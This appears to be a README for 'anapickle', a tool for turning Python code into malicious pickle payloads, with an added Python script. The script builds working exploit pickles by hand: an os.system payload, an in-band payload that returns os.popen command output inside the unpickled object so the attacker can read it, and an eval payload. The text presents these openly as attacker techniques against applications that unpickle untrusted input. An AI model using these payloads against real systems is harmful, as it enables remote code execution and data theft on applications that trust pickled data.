anapickle
An easier way to compile an arbitrary Python file into pickle objects.
See https://gist.github.com/3360650
That method is useful, but it suffers from the same fundamental problem as the classic payload "cos\nsystem\n(S'ls ~'\ntR.": the result of the expression is never inserted into the object returned by pickle.loads() (for os.system, only the command's exit status comes back), so the attacker gets code execution but no way to read the output through the application. Anapickle takes a more generic approach and can produce pickles in which the attacker's code places its result directly inside the reconstructed object, so that if any field of that object is displayed to the user, the attacker can see the output of their attack. The distinction is the same as between in-page results for SQL injection and blind SQL injection: an attack occurs in both cases, but one is significantly easier to exploit.
Incidentally, anapickle also includes a module for running arbitrary Python code, so that angle is covered too; see the 'gen_eval' shellcode module.
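The blind-versus-in-band distinction above, and the eval angle, as an added example that is not anapickle's own code. It hand-assembles protocol-0 pickles: the classic os.system payload (whose loads() result is just an exit status), an in-band variant that stores the command's stdout in a field of the returned dict via getattr(os.popen(cmd), 'read')(), and an eval payload that returns the expression's value. The command strings and the field name 'name' are constructed for illustration.

```python
"""Added example, not code from the anapickle project: hand-built protocol-0
pickles illustrating blind vs. in-band result delivery."""
import os
import pickle
import pickletools


def _check(s: str) -> bytes:
    # Keep the STRING opcode argument trivially safe: no quotes, no newlines.
    if "'" in s or "\n" in s:
        raise ValueError("quotes and newlines are not handled by this toy builder")
    return s.encode("ascii")


def blind_payload(cmd: str) -> bytes:
    """Classic payload: os.system(cmd) runs, but pickle.loads() returns only
    the exit status, so the command's output never reaches the caller."""
    return b"cos\nsystem\n(S'" + _check(cmd) + b"'\ntR."


def inband_payload(cmd: str, field: str = "name") -> bytes:
    """Pickle whose loads() result is {field: <stdout of cmd>}, a stand-in for
    any unpickled record whose fields the application renders.

    Opcode walk-through:
      }                          EMPTY_DICT       object the app will use
      S'name'                    STRING           key
      cbuiltins\\ngetattr          GLOBAL           getattr
      ( cos\\npopen ( S'cmd' t R   os.popen(cmd)
        S'read' t R              getattr(<pipe>, 'read')
      ) R                        <pipe>.read()    -> stdout as str
      s                          SETITEM          dict[key] = stdout
      .                          STOP
    """
    return (
        b"}"
        + b"S'" + _check(field) + b"'\n"
        + b"cbuiltins\ngetattr\n"
        + b"(cos\npopen\n"
        + b"(S'" + _check(cmd) + b"'\ntR"
        + b"S'read'\ntR"
        + b")R"
        + b"s."
    )


def eval_payload(expr: str) -> bytes:
    """Pickle whose loads() result is the value of eval(expr): arbitrary
    Python with its result delivered in-band."""
    return b"cbuiltins\neval\n(S'" + _check(expr) + b"'\ntR."


def unpickle(payload: bytes):
    """What a vulnerable application does with attacker-supplied bytes."""
    return pickle.loads(payload)


if __name__ == "__main__":
    for name, payload in (("blind", blind_payload("true")),
                          ("in-band", inband_payload("echo hello")),
                          ("eval", eval_payload("2 ** 10"))):
        print(f"--- {name} ---")
        pickletools.dis(payload)          # also validates stack discipline
        print("loads() ->", repr(unpickle(payload)))
```

pickletools.dis is worth running on any hand-made pickle: it rejects a stack-unbalanced sequence before you send it anywhere. Note that os.system returns the raw wait status (0 for success here), which is exactly why the blind form tells the attacker nothing beyond "it ran".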